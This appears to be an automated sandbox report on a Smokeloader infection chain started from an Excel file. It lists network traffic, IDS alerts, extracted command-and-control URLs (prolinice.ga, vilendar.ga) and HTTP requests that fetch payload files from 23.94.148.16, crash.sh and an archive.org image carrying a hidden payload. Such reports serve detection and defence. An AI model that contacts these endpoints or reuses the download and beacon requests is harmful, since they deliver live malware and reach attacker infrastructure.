            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.22:49173 -> 185.251.91.119:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.22:49174 -> 185.251.91.119:80
            Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 207.241.232.154:443 -> 192.168.2.22:49171
            Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 185.251.91.119 80Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeDomain query: prolinice.ga
            Source: Malware configuration extractorURLs: http://prolinice.ga/index.php
            Source: Malware configuration extractorURLs: http://vilendar.ga/index.php
            Source: global trafficHTTP traffic detected: GET /27/items/vbs_20240726_20240726/vbs.jpg HTTP/1.1Host: ia803104.us.archive.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /90/WEFV.txt HTTP/1.1Host: 23.94.148.16Connection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 207.241.232.154 207.241.232.154
            Source: Joe Sandbox ViewASN Name: INTERNET-ARCHIVEUS INTERNET-ARCHIVEUS
            Source: Joe Sandbox ViewASN Name: AS-CMNUS AS-CMNUS
            Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
            Source: Joe Sandbox ViewASN Name: SPRINTHOSTRU SPRINTHOSTRU
            Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
            Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
            Source: Network trafficSuricata IDS: 2829848 - Severity 2 - ETPRO MALWARE SmokeLoader encrypted module (3) : 185.251.91.119:80 -> 192.168.2.22:49173
            Source: global trafficHTTP traffic detected: GET /udMVqm HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: crash.shConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /90/gn/inetmecangetbackwithentirethingstobefinewithmesheisnicegirlwholovetodrivethemagicofnicepersonwithmegreatthingshappeningwith_________goodgirlgreatday.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.94.148.16Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /90/verynicebuttersmoothcakeicream.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.94.148.16Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wrbvhkkkwfg.com/User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 275Host: prolinice.ga
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://prolinice.ga/User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 1395Host: prolinice.ga
            Source: unknownHTTPS traffic detected: 208.64.171.230:443 -> 192.168.2.22:49164 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 208.64.171.230:443 -> 192.168.2.22:49165 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 208.64.171.230:443 -> 192.168.2.22:49166 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 207.241.232.154:443 -> 192.168.2.22:49171 version: TLS 1.0
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2CF5F506.emfJump to behavior
            Source: global trafficHTTP traffic detected: GET /udMVqm HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: crash.shConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /27/items/vbs_20240726_20240726/vbs.jpg HTTP/1.1Host: ia803104.us.archive.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /90/gn/inetmecangetbackwithentirethingstobefinewithmesheisnicegirlwholovetodrivethemagicofnicepersonwithmegreatthingshappeningwith_________goodgirlgreatday.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.94.148.16Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /90/verynicebuttersmoothcakeicream.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.94.148.16Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /90/WEFV.txt HTTP/1.1Host: 23.94.148.16Connection: Keep-Alive
            Source: powershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
            Source: global trafficDNS traffic detected: DNS query: crash.sh
            Source: global trafficDNS traffic detected: DNS query: ia803104.us.archive.org
            Source: global trafficDNS traffic detected: DNS query: prolinice.ga
            Source: unknownHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wrbvhkkkwfg.com/User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 275Host: prolinice.ga
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 31 Aug 2024 13:51:11 GMTContent-Type: text/html; charset=utf-8Content-Length: 144Connection: closeX-DNS-Prefetch-Control: offX-Frame-Options: SAMEORIGINStrict-Transport-Security: max-age=15552000; includeSubDomainsX-Download-Options: noopenX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockContent-Security-Policy: default-src 'none'
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 31 Aug 2024 13:51:12 GMTContent-Type: text/html; charset=utf-8Content-Length: 144Connection: closeX-DNS-Prefetch-Control: offX-Frame-Options: SAMEORIGINStrict-Transport-Security: max-age=15552000; includeSubDomainsX-Download-Options: noopenX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockContent-Security-Policy: default-src 'none'
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Sat, 31 Aug 2024 13:51:45 GMTserver: Apache/2.4.59 (Debian)transfer-encoding: chunkedcontent-type: text/html; charset=utf-8Data Raw: 33 37 44 33 0d 0a 18 00 00 00 a0 5f e8 0a 27 e8 c8 da 8d 2a 7f ba 53 e4 29 1d ec 5d a3 3f 18 cd 8f ba 00 ca 2c 05 00 7c e1 f7 57 09 03 02 00 09 00 9e 03 00 00 53 1f 7d 22 77 32 62 71 76 3f 4f 55 52 12 42 00 c9 32 ee 68 fe 0f ca 76 74 07 d6 d6 f9 b8 92 29 e8 55 92 92 3e c8 50 dd 24 a4 99 ce 5c 90 b9 3b fc 51 49 c0 0d f0 19 d3 e9 92 2a 7a f7 09 00 bb 7a b8 01 84 b7 a3 64 8b 0b f3 9f 79 57 fa 26 ce 46 fb 76 8c c7 a7 e0 22 d1 2d c9 1e 43 c3 ef c1 4c dd a0 af 3d b8 a8 a5 fb c0 70 8e 98 0e df 4b cc 40 42 f2 70 5e a2 6b 51 b2 9f 66 73 fe c7 15 ac cd f6 9d 88 6a 44 07 1e 8d 8b 6b 24 18 2b 4b 2a ec 81 b7 50 50 a4 4e ad cf 32 5c c0 15 b4 57 90 1b 0d ee 6c f7 54 23 c9 ed 8e bc 36 a0 b4 7a c0 a1 84 b8 ba d4 a3 62 52 1c ae d9 4b 5a 18 a9 1c db 20 3a d0 44 3f 55 06 6b bf 4b 63 27 f1 ac 4f fe d1 04 8b 3f ba 91 69 f9 fb 81 fe 97 af cd a6 40 69 e9 33 b2 a6 45 cc f6 83 0e 7c 20 5b 7d 1d a4 53 32 fe 9d cc 54 71 e4 4c 20 4c b2 37 b3 8e 0f 1b d8 40 78 f3 c6 c7 84 1a aa 21 d4 fa 17 f2 46 ab 2a 9b db a1 fa 45 c5 f8 a8 f5 78 d7 7b c7 34 f8 40 a6 ce 9e 68 07 d1 3b db 70 67 ae de de 5f 1b 81 d3 b1 e8 be 06 9b bd 51 aa 40 d1 5b 4e 04 32 d7 97 2a e0 96 cc f3 08 be 06 f4 ef f1 48 d0 25 d9 73 3b 22 c7 0f b5 72 bf c3 e5 81 32 31 c9 f4 a1 4c ee 90 56 05 52 a9 1c 76 6f 99 dc ff 39 62 09 4e 0e 7c a8 50 2c 99 64 73 2c f8 8e 19 ec 5e 4c 2b 1b 6a 20 6d e3 2e 26 3e f2 ee 67 21 84 c5 3d 2f 72 90 3a ea 6c 5f b3 01 1d 55 2a 97 6b 1b 48 d7 18 d0 92 ef 20 3e 28 8e b6 b7 0f 4f c2 e3 41 ee a3 e2 e5 4f 7c 04 cf 84 8c 71 e5 91 3b ef 9c 40 2b b4 81 b3 6f 0c e5 ea f4 a9 02 25 53 be 6e 6e 71 ce db f8 20 6e 55 5b a4 66 26 ed 43 1b d2 35 1a 47 54 5d 20 0c 1b 03 8a 54 94 fb f1 d9 5d 91 01 a9 f6 90 b3 3e c6 10 cc 67 ca 7b 76 0b 97 06 5b d8 d2 e2 0f 79 af ed 1b 53 92 e1 e9 cc 7a b6 b9 98 42 38 a5 00 49 58 88 86 83 3c a1 5c d3 72 7d ad bc 8d 80 b4 ea 85 32 d9 b9 33 ce ae d5 90 f4 bb 3a c9 3d 3b 48 a7 e3 58 dd be d0 8a aa 01 3e 48 f4 19 2b 95 d5 65 ff b4 78 a1 d2 cd 69 0a 91 f7 6a 18 3d 4f 75 b1 bc 1b b1 60 c8 27 8c 70 db 33 0d a6 f2 ed 80 8d aa 7c 4a 8c 59 8c 3d 99 a9 52 09 0f d9 5e 58 eb 6f 11 c9 5b 23 0e a9 04 11 b7 a5 6b eb 6e 85 01 89 5e cf 54 06 96 02 2d c3 92 6c 61 40 ee 39 ff fa 3e 0d c6 24 8f 1c 02 ac 7a ab 13 d0 be a8 cb 90 7c 6b d5 fb ae 58 ee db 76 10 36 cb d3 c0 5d 0e e0 08 4f 38 94 52 92 70 bf 7c bd c4 0d 6f f9 74 7a 41 a6 59 ea 90 d6 8f 1b 32 75 08 c5 9a 2d a0 6a 8b fd 6b c4 c2 37 35 48 bd 8c 96 77 e4 62 45 8d 49 72 d0 11 c5 42 47 60 cf 79 cc d5 44 76 86 c6 57 e5 fc f1 b9 98 00 52 87 30 6d b6 64 39 d2 05 09 e3 9f 97 c0 b2 ad 6e c6 de 2f e7 0e 6f d3 63 06 8f 24 00 37 f9 3b 90 9e fb 4b 43 08 3f 69 cf 54 36 03 b2 63 54 a5 44 81 f8 93 a5 ad 2f f5 7f 9b ad 6d 23 d8 52 1c 7c d0 7e ed e5 00 cd 59 0c 72 ff c8 4d 8a 9f 4d 22 6a 89 67 05 b3 b9 2f fa 37 ad b4 05 f0 4c 9c d2 83 fb c8 40 2b ca 87 d7 d8 99 59 38 07 be e8 b3 e1 23 2a
